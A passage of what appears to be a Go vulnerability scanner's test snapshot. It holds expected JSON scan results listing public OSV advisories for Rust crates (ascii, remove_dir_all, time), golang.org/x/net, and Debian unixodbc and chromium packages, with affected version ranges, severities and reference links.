"https://go.dev/issue/57855" }, { "type": "FIX", "url": "https://go.dev/cl/468135" }, { "type": "FIX", "url": "https://go.dev/cl/468295" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E" } ], "schema_version": "1.4.0" } ] } ] }, { "source": { "path": "testdata/filter/none/configs/c/", "type": "lockfile" }, "packages": [ { "package": { "name": "ascii", "version": "0.8.7", "ecosystem": "crates.io" }, "groups": [ { "ids": [ "GHSA-mrrw-grhq-86gf" ], "aliases": [ "GHSA-mrrw-grhq-86gf" ], "max_severity": "" }, { "ids": [ 
"RUSTSEC-2023-0015" ], "aliases": [ "RUSTSEC-2023-0015" ], "max_severity": "" } ], "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-mrrw-grhq-86gf/GHSA-mrrw-grhq-86gf.json" }, "package": { "ecosystem": "crates.io", "name": "ascii", "purl": "pkg:cargo/ascii" }, "ranges": [ { "events": [ { "introduced": "0.6.0" }, { "fixed": "0.9.3" } ], "type": "SEMVER" } ] } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2023-02-28T20:30:10Z", "nvd_published_at": null, "severity": "MODERATE" }, "details": "Affected version of this crate had implementation of `From\u003c\u0026mut AsciiStr\u003e` for `\u0026mut [u8]` and `\u0026mut str`. This can result in out-of-bounds array indexing in safe code.\n\nThe flaw was corrected in commit [8a6c779](https://github.com/tomprogrammer/rust-ascii/pull/63/commits/8a6c7798c202766bd57d70fb8d12739dd68fb9dc) by removing those impls.\n", "id": "GHSA-mrrw-grhq-86gf", "modified": "2023-02-28T20:30:10Z", "published": "2023-02-28T20:30:10Z", "references": [ { "type": "WEB", "url": "https://github.com/tomprogrammer/rust-ascii/issues/64" }, { "type": "WEB", "url": "https://github.com/tomprogrammer/rust-ascii/pull/63/commits/8a6c7798c202766bd57d70fb8d12739dd68fb9dc" }, { "type": "PACKAGE", "url": "https://github.com/tomprogrammer/rust-ascii" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0015.html" } ], "schema_version": "1.4.0", "summary": "Ascii (crate) allows out-of-bounds array indexing in safe code" }, { "affected": [ { "database_specific": { "categories": [ "memory-corruption" ], "cvss": null, "informational": "unsound", "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2023-0015.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [], "os": [] } }, "package": { "ecosystem": "crates.io", "name": "ascii", "purl": 
"pkg:cargo/ascii" }, "ranges": [ { "events": [ { "introduced": "0.6.1-0" }, { "fixed": "0.9.3" } ], "type": "SEMVER" } ] } ], "details": "Affected version of this crate had implementation of `From\u003c\u0026mut AsciiStr\u003e` for `\u0026mut [u8]` and `\u0026mut str`. This can result in out-of-bounds array indexing in safe code.\n\nThe flaw was corrected in commit [8a6c779](https://github.com/tomprogrammer/rust-ascii/pull/63/commits/8a6c7798c202766bd57d70fb8d12739dd68fb9dc) by removing those impls.", "id": "RUSTSEC-2023-0015", "modified": "2023-02-25T15:13:09Z", "published": "2023-02-25T12:00:00Z", "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/ascii" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0015.html" }, { "type": "REPORT", "url": "https://github.com/tomprogrammer/rust-ascii/issues/64" } ], "schema_version": "1.4.0", "summary": "Ascii allows out-of-bounds array indexing in safe code" } ] }, { "package": { "name": "remove_dir_all", "version": "0.5.3", "ecosystem": "crates.io" }, "groups": [ { "ids": [ "GHSA-mc8h-8q98-g5hr", "RUSTSEC-2023-0018" ], "aliases": [ "GHSA-mc8h-8q98-g5hr", "RUSTSEC-2023-0018" ], "max_severity": "" } ], "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-mc8h-8q98-g5hr/GHSA-mc8h-8q98-g5hr.json" }, "package": { "ecosystem": "crates.io", "name": "remove_dir_all", "purl": "pkg:cargo/remove_dir_all" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "0.8.0" } ], "type": "SEMVER" } ] } ], "database_specific": { "cwe_ids": [ "CWE-366", "CWE-367" ], "github_reviewed": true, "github_reviewed_at": "2023-02-24T16:23:59Z", "nvd_published_at": null, "severity": "LOW" }, "details": "The `remove_dir_all` crate is a Rust library that offers additional features over the Rust standard library `fs::remove_dir_all` function. 
It suffers the same class of failure as the code it was layering over: TOCTOU race conditions, with the ability to cause arbitrary paths to be deleted by substituting a symlink for a path after the type of the path was checked.\n\nThanks to the Rust security team for identifying the problem and alerting us to it.", "id": "GHSA-mc8h-8q98-g5hr", "modified": "2023-02-24T16:23:59Z", "published": "2023-02-24T16:23:59Z", "references": [ { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/security/advisories/GHSA-mc8h-8q98-g5hr" }, { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/commit/7247a8b6ee59fc99bbb69ca6b3ca4bfd8c809ead" }, { "type": "PACKAGE", "url": "https://github.com/XAMPPRocky/remove_dir_all" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0018.html" } ], "schema_version": "1.4.0", "summary": "Race Condition Enabling Link Following and Time-of-check Time-of-use (TOCTOU) Race Condition in remove_dir_all" }, { "affected": [ { "database_specific": { "categories": [], "cvss": null, "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2023-0018.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "remove_dir_all::ensure_empty_dir", "remove_dir_all::remove_dir_all", "remove_dir_all::remove_dir_contents" ], "os": [] } }, "package": { "ecosystem": "crates.io", "name": "remove_dir_all", "purl": "pkg:cargo/remove_dir_all" }, "ranges": [ { "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.8.0" } ], "type": "SEMVER" } ] } ], "aliases": [ "GHSA-mc8h-8q98-g5hr" ], "details": "The remove_dir_all crate is a Rust library that offers additional features over the Rust\nstandard library fs::remove_dir_all function.\n\nIt was possible to trick a privileged process doing a recursive delete in an\nattacker controlled directory into deleting privileged files, on all operating systems.\n\nFor instance, consider deleting a tree called 'etc' in a parent 
directory\ncalled 'p'. Between calling `remove_dir_all(\"a\")` and remove_dir_all(\"a\")\nactually starting its work, the attacker can move 'p' to 'p-prime', and\nreplace 'p' with a symlink to '/'. Then the privileged process deletes 'p/etc'\nwhich is actually /etc, and now your system is broken. There are some\nmitigations for this exact scenario, such as CWD relative file lookup, but\nthey are not guaranteed - any code using absolute paths will not have that\nprotection in place.\n\nThe same attack could be performed at any point in the directory tree being\ndeleted: if 'a' contains a child directory called 'etc', attacking the\ndeletion by replacing 'a' with a link is possible.\n\nThe new code in this release mitigates the attack within the directory tree\nbeing deleted by using file-handle relative operations: to open 'a/etc', the\npath 'etc' relative to 'a' is opened, where 'a' is represented by a file\ndescriptor (Unix) or handle (Windows). With the exception of the entry points\ninto the directory deletion logic, this is robust against manipulation of the\ndirectory hierarchy, and remove_dir_all will only delete files and directories\ncontained in the tree it is deleting.\n\nThe entry path however is a challenge - as described above, there are some\npotential mitigations, but since using them must be done by the calling code,\nit is hard to be confident about the security properties of the path based\ninterface.\n\nThe new extension trait `RemoveDir` provides an interface where it is much\nharder to get it wrong.\n\n`somedir.remove_dir_contents(\"name-of-child\")`.\n\nCallers can then make their own security evaluation about how to securely get\na directory handle. That is still not particularly obvious, and we're going to\nfollow up with a helper of some sort (probably in the `fs_at` crate). 
Once\nthat is available, the path based entry points will get deprecated.\n\nIn the interim, processes that might run with elevated privileges should\nfigure out how to securely identify the directory they are going to delete, to\navoid the initial race. Pragmatically, other processes should be fine with the\npath based entry points : this is the same interface `std::fs::remove_dir_all`\noffers, and an unprivileged process running in an attacker controlled\ndirectory can't do anything that the attacker can't already do.", "id": "RUSTSEC-2023-0018", "modified": "2023-03-04T21:50:30Z", "published": "2023-02-24T12:00:00Z", "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/remove_dir_all" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0018.html" }, { "type": "WEB", "url": "https://github.com/XAMPPRocky/remove_dir_all/commit/7247a8b6ee59fc99bbb69ca6b3ca4bfd8c809ead" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-mc8h-8q98-g5hr" } ], "schema_version": "1.4.0", "summary": "Race Condition Enabling Link Following and Time-of-check Time-of-use (TOCTOU)" } ] }, { "package": { "name": "time", "version": "0.1.45", "ecosystem": "crates.io" }, "groups": [ { "ids": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ], "aliases": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ], "max_severity": "" } ], "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" }, "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "events": [ { "introduced": "0.1" }, { "last_affected": "0.2" } ], "type": "SEMVER" } ] }, { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" }, "ecosystem_specific": { "affected_functions": [ 
"time::UtcOffset::local_offset_at", "time::UtcOffset::try_local_offset_at", "time::UtcOffset::current_local_offset", "time::UtcOffset::try_current_local_offset", "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local" ] }, "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "events": [ { "introduced": "0.2.7" }, { "fixed": "0.2.23" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2020-26235" ], "database_specific": { "cwe_ids": [ "CWE-476" ], "github_reviewed": true, "severity": "MODERATE" }, "details": "### Impact\n\nUnix-like operating systems may segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nIn some versions of `time`, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods. In later versions, `time` will attempt to determine the number of threads running in the process. 
If the process is single-threaded, the call will proceed as its safety invariant is upheld.\n\nUsers and library authors with time in their dependency tree must perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and must upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nLibrary authors must ensure that the program only has one running thread at the time of calling any affected method. Binary authors may do the same and/or ensure that no other thread is actively mutating the environment.\n\n### References\n\n[time-rs/time#293](https://github.com/time-rs/time/issues/293).", "id": "GHSA-wcg3-cvx6-7396", "modified": "2022-12-06T00:16:25Z", "published": "2021-08-25T20:56:46Z", "references": [ { "type": "WEB", "url": "https://github.com/time-rs/time/security/advisories/GHSA-wcg3-cvx6-7396" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26235" }, { "type": "WEB", "url": "https://github.com/time-rs/time/issues/293" }, { "type": "WEB", "url": "https://crates.io/crates/time/0.2.23" }, { "type": "PACKAGE", "url": "https://github.com/time-rs/time" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" } ], "schema_version": "1.4.0", "summary": "Segmentation fault in time" }, { "affected": [ { "database_specific": { "categories": [ "code-execution", "memory-corruption" ], "cvss": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2020-0071.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local", "time::UtcOffset::current_local_offset", "time::UtcOffset::local_offset_at", "time::UtcOffset::try_current_local_offset", "time::UtcOffset::try_local_offset_at", "time::at", "time::at_utc", "time::now" ], "os": [ "linux", "redox", "solaris", 
"android", "ios", "macos", "netbsd", "openbsd", "freebsd" ] } }, "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.2.0" }, { "introduced": "0.2.1-0" }, { "fixed": "0.2.1" }, { "introduced": "0.2.2-0" }, { "fixed": "0.2.2" }, { "introduced": "0.2.3-0" }, { "fixed": "0.2.3" }, { "introduced": "0.2.4-0" }, { "fixed": "0.2.4" }, { "introduced": "0.2.5-0" }, { "fixed": "0.2.5" }, { "introduced": "0.2.6-0" }, { "fixed": "0.2.6" }, { "introduced": "0.2.7-0" }, { "fixed": "0.2.23" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2020-26235" ], "details": "### Impact\n\nUnix-like operating systems may segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nPending a proper fix, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. 
This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods.\n\nUsers and library authors with time in their dependency tree should perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and should upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nA possible workaround for crates affected through the transitive dependency in `chrono`, is to avoid using the default `oldtime` feature dependency of the `chrono` crate by disabling its `default-features` and manually specifying the required features instead.\n\n#### Examples:\n\n`Cargo.toml`: \n\n```toml\nchrono = { version = \"0.4\", default-features = false, features = [\"serde\"] }\n```\n\n```toml\nchrono = { version = \"0.4.22\", default-features = false, features = [\"clock\"] }\n```\n\nCommandline: \n\n```bash\ncargo add chrono --no-default-features -F clock\n```\n\nSources: \n - [chronotope/chrono#602 (comment)](https://github.com/chronotope/chrono/issues/602#issuecomment-1242149249) \n - [vityafx/serde-aux#21](https://github.com/vityafx/serde-aux/issues/21)", "id": "RUSTSEC-2020-0071", "modified": "2023-02-08T15:06:38Z", "published": "2020-11-18T12:00:00Z", "references": [ { "type": "PACKAGE", "url": "https://crates.io/crates/time" }, { "type": "ADVISORY", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" }, { "type": "REPORT", "url": "https://github.com/time-rs/time/issues/293" } ], "schema_version": "1.4.0", "summary": "Potential segfault in the time crate" } ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } } } --- [Test_filterResults/filter_partially - 1] { "results": [ { "source": { "path": "testdata/filter/some/configs/a/", "type": "lockfile" }, "packages": [ { "package": { "name": "unixodbc", "version": "2.3.11-2", "ecosystem": "Debian:10" }, "groups": [ { "ids": [ "CVE-2024-1013" ], "aliases": null, 
"max_severity": "" } ], "vulnerabilities": [ { "affected": [ { "ecosystem_specific": { "urgency": "unimportant" }, "package": { "ecosystem": "Debian:10", "name": "unixodbc" }, "ranges": [ { "events": [ { "introduced": "0" } ], "type": "ECOSYSTEM" } ] } ], "details": "An out-of-bounds stack write flaw was found in unixODBC on 64-bit architectures where the caller has 4 bytes and callee writes 8 bytes. This issue may go unnoticed on little-endian architectures, while big-endian architectures can be broken.", "id": "CVE-2024-1013", "modified": "2024-03-18T12:38:25Z", "published": "2024-03-18T11:15:09Z", "references": [ { "type": "REPORT", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2260823" }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2024-1013" }, { "type": "WEB", "url": "https://github.com/lurcher/unixODBC/pull/157" } ] } ] }, { "package": { "name": "chromium", "version": "73.0.3683.75-1", "ecosystem": "Debian:10" }, "groups": [ { "ids": [ "CVE-2024-3847" ], "aliases": null, "max_severity": "" } ], "vulnerabilities": [ { "affected": [ { "ecosystem_specific": { "urgency": "low" }, "package": { "ecosystem": "Debian:10", "name": "chromium" }, "ranges": [ { "events": [ { "introduced": "0" } ], "type": "ECOSYSTEM" } ] }, { "ecosystem_specific": { "urgency": "low" }, "package": { "ecosystem": "Debian:11", "name": "chromium" }, "ranges": [ { "events": [ { "introduced": "0" } ], "type": "ECOSYSTEM" } ] } ], "details": "Insufficient policy enforcement in WebUI in Google Chrome prior to 124.0.6367.60 allowed a remote attacker to bypass content security policy via a crafted HTML page. 
(Chromium security severity: Low)", "id": "CVE-2024-3847", "modified": "2024-05-03T03:16:29Z", "published": "2024-04-17T08:15:10Z", "references": [ { "type": "ARTICLE", "url": "https://chromereleases.googleblog.com/2024/04/stable-channel-update-for-desktop_16.html" }, { "type": "WEB", "url": "https://issues.chromium.org/issues/328690293" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CWIVXXSVO5VB3NAZVFJ7CWVBN6W2735T/" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IDLUD644WEWGOFKMZWC2K7Z4CQOKQYR7/" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M4PCXKCOVBUUU6GOSN46DCPI4HMER3PJ/" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PCWPUBGTBNT4EW32YNZMRIPB3Y4R6XL6/" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UOC3HLIZCGMIJLJ6LME5UWUUIFLXEGRN/" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WEP5NJUWMDRLDQUKU4LFDUHF5PCYAPIO/" } ] } ] } ] }, { "source": { "path": "testdata/filter/some/configs/b/", "type": "lockfile" }, "packages": [ { "package": { "name": "golang.org/x/net", "version": "0.1.0", "ecosystem": "Go" }, "groups": [ { "ids": [ "GHSA-vvpx-j8f3-3w6h", "GO-2023-1571" ], "aliases": [ "GHSA-vvpx-j8f3-3w6h", "GO-2023-1571" ], "max_severity": "" } ], "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-vvpx-j8f3-3w6h/GHSA-vvpx-j8f3-3w6h.json" }, "ecosystem_specific": { "urgency": "unimportant" }, "package": { "ecosystem": "Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { 
"events": [ { "introduced": "0" }, { "fixed": "0.7.0" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2022-41723" ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2023-02-17T14:00:02Z", "nvd_published_at": "2023-02-28T18:15:00Z", "severity": "HIGH" }, "details": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", "id": "GHSA-vvpx-j8f3-3w6h", "modified": "2023-03-09T21:20:44Z", "published": "2023-02-17T14:00:02Z", "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723" }, { "type": "WEB", "url": "https://go.dev/cl/468135" }, { "type": "WEB", "url": "https://go.dev/cl/468295" }, { "type": "WEB", "url": "https://go.dev/issue/57855" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2023-1571" }, { "type": "WEB", "url": "https://vuln.go.dev/ID/GO-2023-1571.json" } ], "schema_version": "1.4.0", "summary": "Uncontrolled Resource Consumption" }, { "affected": [ { "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1571.json", "url": "https://pkg.go.dev/vuln/GO-2023-1571" }, "ecosystem_specific": { "imports": [ { "path": "net/http" } ], "urgency": "low" }, "package": { "ecosystem": "Go", "name": "stdlib", "purl": "pkg:golang/stdlib" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "1.19.6" }, { "introduced": "1.20.0" }, { "fixed": "1.20.1" } ], "type": "SEMVER" } ] }, { "database_specific": { "source": "https://vuln.go.dev/ID/GO-2023-1571.json", "url": "https://pkg.go.dev/vuln/GO-2023-1571" }, "ecosystem_specific": { "imports": [ { "path": "golang.org/x/net/http2" }, { "path": "golang.org/x/net/http2/hpack", "symbols": [ "Decoder.DecodeFull", "Decoder.Write", "Decoder.parseFieldLiteral", "Decoder.readString" ] } ] }, "package": { "ecosystem": 
"Go", "name": "golang.org/x/net", "purl": "pkg:golang/golang.org/x/net" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "0.7.0" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2022-41723", "GHSA-vvpx-j8f3-3w6h" ], "details": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", "id": "GO-2023-1571", "modified": "2023-02-22T20:13:12Z", "published": "2023-02-16T22:31:36Z", "references": [ { "type": "REPORT", "url": "https://go.dev/issue/57855" }, { "type": "FIX", "url": "https://go.dev/cl/468135" }, { "type": "FIX", "url": "https://go.dev/cl/468295" }, { "type": "WEB", "url": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E" } ], "schema_version": "1.4.0" } ] } ] }, { "source": { "path": "testdata/filter/some/configs/c/", "type": "lockfile" }, "packages": [ { "package": { "name": "ascii", "version": "0.8.7", "ecosystem": "crates.io" }, "groups": [ { "ids": [ "GHSA-mrrw-grhq-86gf" ], "aliases": [ "GHSA-mrrw-grhq-86gf" ], "max_severity": "" } ], "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-mrrw-grhq-86gf/GHSA-mrrw-grhq-86gf.json" }, "package": { "ecosystem": "crates.io", "name": "ascii", "purl": "pkg:cargo/ascii" }, "ranges": [ { "events": [ { "introduced": "0.6.0" }, { "fixed": "0.9.3" } ], "type": "SEMVER" } ] } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2023-02-28T20:30:10Z", "nvd_published_at": null, "severity": "MODERATE" }, "details": "Affected version of this crate had implementation of `From\u003c\u0026mut AsciiStr\u003e` for `\u0026mut [u8]` and `\u0026mut str`. 
This can result in out-of-bounds array indexing in safe code.\n\nThe flaw was corrected in commit [8a6c779](https://github.com/tomprogrammer/rust-ascii/pull/63/commits/8a6c7798c202766bd57d70fb8d12739dd68fb9dc) by removing those impls.\n", "id": "GHSA-mrrw-grhq-86gf", "modified": "2023-02-28T20:30:10Z", "published": "2023-02-28T20:30:10Z", "references": [ { "type": "WEB", "url": "https://github.com/tomprogrammer/rust-ascii/issues/64" }, { "type": "WEB", "url": "https://github.com/tomprogrammer/rust-ascii/pull/63/commits/8a6c7798c202766bd57d70fb8d12739dd68fb9dc" }, { "type": "PACKAGE", "url": "https://github.com/tomprogrammer/rust-ascii" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2023-0015.html" } ], "schema_version": "1.4.0", "summary": "Ascii (crate) allows out-of-bounds array indexing in safe code" } ] }, { "package": { "name": "time", "version": "0.1.45", "ecosystem": "crates.io" }, "groups": [ { "ids": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ], "aliases": [ "GHSA-wcg3-cvx6-7396", "RUSTSEC-2020-0071" ], "max_severity": "" } ], "vulnerabilities": [ { "affected": [ { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" }, "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "events": [ { "introduced": "0.1" }, { "last_affected": "0.2" } ], "type": "SEMVER" } ] }, { "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/08/GHSA-wcg3-cvx6-7396/GHSA-wcg3-cvx6-7396.json" }, "ecosystem_specific": { "affected_functions": [ "time::UtcOffset::local_offset_at", "time::UtcOffset::try_local_offset_at", "time::UtcOffset::current_local_offset", "time::UtcOffset::try_current_local_offset", "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local" ] }, "package": { "ecosystem": "crates.io", "name": "time", "purl": 
"pkg:cargo/time" }, "ranges": [ { "events": [ { "introduced": "0.2.7" }, { "fixed": "0.2.23" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2020-26235" ], "database_specific": { "cwe_ids": [ "CWE-476" ], "github_reviewed": true, "severity": "MODERATE" }, "details": "### Impact\n\nUnix-like operating systems may segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nIn some versions of `time`, the internal method that determines the local offset has been modified to always return `None` on the affected operating systems. This has the effect of returning an `Err` on the `try_*` methods and `UTC` on the non-`try_*` methods. In later versions, `time` will attempt to determine the number of threads running in the process. If the process is single-threaded, the call will proceed as its safety invariant is upheld.\n\nUsers and library authors with time in their dependency tree must perform `cargo update`, which will pull in the updated, unaffected code.\n\nUsers of time 0.1 do not have a patch and must upgrade to an unaffected version: time 0.2.23 or greater or the 0.3 series.\n\n### Workarounds\n\nLibrary authors must ensure that the program only has one running thread at the time of calling any affected method. 
Binary authors may do the same and/or ensure that no other thread is actively mutating the environment.\n\n### References\n\n[time-rs/time#293](https://github.com/time-rs/time/issues/293).", "id": "GHSA-wcg3-cvx6-7396", "modified": "2022-12-06T00:16:25Z", "published": "2021-08-25T20:56:46Z", "references": [ { "type": "WEB", "url": "https://github.com/time-rs/time/security/advisories/GHSA-wcg3-cvx6-7396" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26235" }, { "type": "WEB", "url": "https://github.com/time-rs/time/issues/293" }, { "type": "WEB", "url": "https://crates.io/crates/time/0.2.23" }, { "type": "PACKAGE", "url": "https://github.com/time-rs/time" }, { "type": "WEB", "url": "https://rustsec.org/advisories/RUSTSEC-2020-0071.html" } ], "schema_version": "1.4.0", "summary": "Segmentation fault in time" }, { "affected": [ { "database_specific": { "categories": [ "code-execution", "memory-corruption" ], "cvss": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "informational": null, "source": "https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2020-0071.json" }, "ecosystem_specific": { "affects": { "arch": [], "functions": [ "time::OffsetDateTime::now_local", "time::OffsetDateTime::try_now_local", "time::UtcOffset::current_local_offset", "time::UtcOffset::local_offset_at", "time::UtcOffset::try_current_local_offset", "time::UtcOffset::try_local_offset_at", "time::at", "time::at_utc", "time::now" ], "os": [ "linux", "redox", "solaris", "android", "ios", "macos", "netbsd", "openbsd", "freebsd" ] } }, "package": { "ecosystem": "crates.io", "name": "time", "purl": "pkg:cargo/time" }, "ranges": [ { "events": [ { "introduced": "0.0.0-0" }, { "fixed": "0.2.0" }, { "introduced": "0.2.1-0" }, { "fixed": "0.2.1" }, { "introduced": "0.2.2-0" }, { "fixed": "0.2.2" }, { "introduced": "0.2.3-0" }, { "fixed": "0.2.3" }, { "introduced": "0.2.4-0" }, { "fixed": "0.2.4" }, { "introduced": "0.2.5-0" }, { "fixed": "0.2.5" }, { "introduced": 
"0.2.6-0" }, { "fixed": "0.2.6" }, { "introduced": "0.2.7-0" }, { "fixed": "0.2.23" } ], "type": "SEMVER" } ] } ], "aliases": [ "CVE-2020-26235" ], "details": "### Impact\n\nUnix-like operating systems may segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.\n\nThe affected functions from time 0.2.7 through 0.2.22 are:\n\n- `time::UtcOffset::local_offset_at`\n- `time::UtcOffset::try_local_offset_at`\n- `time::UtcOffset::current_local_offset`\n- `time::UtcOffset::try_current_local_offset`\n- `time::OffsetDateTime::now_local`\n- `time::OffsetDateTime::try_now_local`\n\nThe affected functions in time 0.1 (all versions) are:\n\n- `at`\n- `at_utc`\n- `now`\n\nNon-Unix targets (including Windows and wasm) are unaffected.\n\n### Patches\n\nPending a proper fix, the internal method that determines the local offset 